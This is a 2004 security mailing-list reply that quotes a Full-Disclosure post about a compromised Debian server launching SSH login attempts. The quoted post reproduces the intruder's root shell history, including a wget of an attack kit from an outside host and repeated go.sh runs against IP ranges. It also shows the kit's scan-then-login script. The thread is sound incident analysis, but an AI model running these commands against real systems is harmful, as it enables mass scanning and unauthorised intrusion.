From: Rui Pedro Figueira Covelo <rpfc@××××××××××××.pt>
To: gentoo-security@l.g.o
Subject: Re: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?]
Date: Thu, 29 Jul 2004 20:26:16
2 Hash: SHA1
3
4 I noticed that the .bash_history it's from the root account. Not guest
5 or test. If this .bash_history is real, the fact that someone got root
6 proves that someone used an exploit rather than guessing a weak password
7 of a guest or test account, right?
13 Dan Margolis wrote:
14 | I grabbed the tgz before it's too late. I plan on running it with a
15 | sniffer so I can see what it's doing--that should indicate whether it's
16 | really using some unknown ssh exploit (I'm afraid I'm not a whiz at
17 | disassembly, so I'd rather not take that route). I tend to think it's
18 | not; there was an OpenSSH vuln a while back that this guy's Debian
19 | machine might still be vulnerable to, if it wasn't patched in a year. If
20 | there were an unknown vulnerability, he'd be having a lot more success
21 | and we'd be seeing this a whole lot more (unless we're all rooted and
22 | don't know it).
23 |
24 | Anyone have any more information on this?
25 |
26 | -------- Original Message --------
27 |
28 | From: Stefan Janecek <stefan.janecek@×××.at>
29 | To: full-disclosure@××××××××××××.com
30 |
31 |
32 | Hmmm - I have also been getting those login attemps, but thought them to
33 | be harmless. Maybe they are not *that* harmless, though... Today I
34 | managed to get my hands on a machine that was originating such login
35 | attempts. I must admit I am far from being a linux security expert, but
36 | this is what I've found out up to now:
37 |
38 | Whoever broke into the machine did not take any attempts to cover up his
39 | tracks - this is what I found in /root/.bash_history:
40 |
41 | ------
42 | id
43 | uname -a
44 | w
45 | id
46 | ls
47 | wgte frauder.us/linux/ssh.tgz
48 | wget frauder.us/linux/ssh.tgz
49 | tar xzvf ssh.tgz
50 | tar xvf ssh.tgz
51 | ls
52 | cd ssh
53 | ls
54 | ./go.sh 195.178
55 | ls
56 | pico uniq.txt
57 | vi uniq.txt
58 | ls
59 | rm -rf uniq.txt
60 | ./go.sh 167.205
61 | ls
62 | rm -rf uniq.txt vuln.txt
63 | ./go.sh 202.148.20
64 | ./go.sh 212.92
65 | ./go.sh 195.197
66 | ./go.sh 147.32
67 | ./go.sh 213.168
68 | ./go.sh 134.176
69 | ./go.sh 195.83
70 | ------
71 |
72 | um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
73 | binaries:
74 |
75 | go.sh:
76 | -------
77 | ./ss 22 -b $1 -i eth0 -s 6
78 | cat bios.txt |sort | uniq > uniq.txt
79 | ./sshf
80 | -------
81 |
82 | * 'ss' apparently is some sort of portscanner
83 | * 'sshf' connects to every IP in uniq.txt and tries to log in as user
84 | 'test' first, then as user 'guest' (according to tcpdump).
85 |
86 | This does not seem to be a stupid brute force attack, as there is only
87 | one login attempt per user. Could it be that the tool tries to exploit
88 | some vulnerability in the sshd, and just tries to look harmless by using
89 | 'test' and 'guest' as usernames?
90 |
91 | The compromised machine was running an old debian woody installation
92 | which had not been upgraded for at least one year, the sshd version
93 | string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
94 |
95 | As already mentioned, I am far from being an expert, but if I can assist
96 | in further testing, then let me know. Please CC me, I am not subscribed
97 | to the list.
98 |
99 | cheers,
100 | Stefan
101 |
102 |
103 |
104 |
105 |
106 |
107 | _______________________________________________
108 | Full-Disclosure - We believe in it.
109 | Charter: http://lists.netsys.com/full-disclosure-charter.html
110 |
111 |
112 | --